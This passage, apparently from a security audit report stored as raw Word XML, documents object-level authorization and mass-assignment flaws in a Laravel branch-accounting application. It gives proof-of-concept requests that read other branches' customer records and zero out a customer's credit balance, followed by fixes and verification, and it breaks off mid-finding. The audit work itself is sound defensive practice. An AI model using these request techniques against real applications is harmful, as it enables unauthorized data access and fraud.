    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="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3"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP A01:2021 / API1:2023 BOLA · CWE-639 · High</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">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Evidence.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Every </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{id}</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> handler was a bare primary-key lookup:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AC">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CustomerController.php:101   Customer::with('department')-&gt;find($id);</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">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InvoiceController.php:229    Invoice::with([...])-&gt;find($id);</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">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GrnController.php:207        Grn::with([...])-&gt;find($id);</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">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Users carry a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">department_id</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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User.php:24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">() and so do the records </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Invoice.php:16</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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Grn.php:15</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). Branch isolation was</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> modelled throughout the schema and enforced nowhere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B0">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Exploit.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Authenticated as the Colombo cashier (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">department_id = 1</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B1">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GET /api/customers/2  → 200   leaked "Dilani Wickramasinghe", credit balance 78,500.00</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">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GET /api/invoices/2   → 200   leaked the Kandy branch invoice INV0002</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3">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Ids are sequential integers, so an employee could walk the whole database: every customer's name, address, phone and NIC, every invoice, every stock batch and its cost price, across every branch.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4">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Root cause.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The classic shape of a broken-access-control defect: DiscountRequestController::index:116 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">does</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> scope its query to the caller. One place got it right. The pattern was understood and simply not applied anywhere else, because nothing made the omission visible.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">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A ScopedToDepartment trait on Customer , Invoice and Grn , providing -&gt;visibleTo($user) .</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6">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Two decisions worth stating:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">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 A trait with an explicit call site, not a global scope.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> A global scope would silently filter every query in the application including reports and background work and would be switched off by anyone writing withoutGlobalScopes() without understanding why it was there. -&gt;visibleTo() is greppable the scoped call sites can be listed, and anything unscoped is visible by its absence.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">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 404, not 403.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> A 403 confirms the record exists, letting an attacker enumerate ids and map another branch's data volumes without reading a field. "Not found" and "not yours" must be indistinguishable from outside.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">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A user with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">no</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> department sees </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nothing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, not everything treating a missing department_id as "all departments" would turn a data-entry omission into a privilege escalation.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA">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Applied to 13 lookups </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">plus the index() listings</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, since fixing only the {id} handlers would have leaked the same data in bulk.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">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Verified.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cross-branch reads → 404. Own-branch → 200. Administrator → sees all. Listing endpoints scoped. Orphaned user sees nothing.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="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V-04 · Mass assignment erased customer debt and rewrote business keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="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3"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP A08:2021 / API6:2023 · CWE-915 · High</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">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Evidence.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Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CustomerController.php:148</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The method </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">does</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> validate first, which is what makes this easy to miss:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">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$request-&gt;validate([ ... 'credit_balance' =&gt; 'nullable|numeric|min:0' ]);</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0">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$data = $request-&gt;all();      // rules checked; payload NOT filtered</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1">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$customer-&gt;update($data);</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">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Validation checks the keys it lists; it does not filter the payload.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  Any other key present in the request including any column in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$fillable</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was mass-assigned untouched. Only </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">validated()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> filters.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276"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Exploit.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4">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PUT /customers/1 {"credit_balance": 0}         → 200</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5">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45</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6">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,000 LKR of debt erased, no CreditTransaction row written</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7">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PUT /customers/3 {"customer_code": "CUS-HIJACKED"}  → 200</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8">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the key invoices and credit_transactions join on, rewritten</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C9">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second exploit only succeeded on a customer with no invoices  on others the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">database</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> foreign key blocked it. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The application never objected</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so that protection was incidental, not designed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA">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The same $request-&gt;all() pattern with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">no validation at all</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
